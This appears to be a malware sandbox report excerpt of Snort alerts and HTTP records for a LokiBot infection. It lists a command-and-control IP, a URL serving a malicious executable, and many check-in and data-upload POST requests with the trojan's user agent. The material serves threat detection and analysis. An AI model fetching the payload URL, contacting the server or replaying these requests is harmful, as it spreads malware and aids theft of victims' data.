Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49249 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49249 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49249 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49249
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49250 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49250
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49251 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49251
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49252 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49252
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49253 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49253
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49254 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49254
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49255 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49255
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49256 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49256
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49257 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49257
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49258 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49258
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49259 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49259
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49260 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49260
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49261 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49261
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49262 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49262
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49263 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49263
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49264 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49264
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49265 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49265
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49266 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49266
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.22:49267 -> 185.206.215.56:80
Source: Traffic Snort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 185.206.215.56:80 -> 192.168.2.22:49267
Source: Traffic Snort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.22:49268 -> 185.206.215.56:80
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /wp-content/themes/index/QPR-3067.exe HTTP/1.1Host: bighoreca.nlConnection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.22.0.232
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View ASN Name: ON-LINE-DATAServerlocation-NetherlandsDrontenNL
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 176Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
Source: global traffic HTTP traffic detected: POST /morx/1/cgi.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 185.206.215.56Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 598F9AF4Content-Length: 149Connection: close
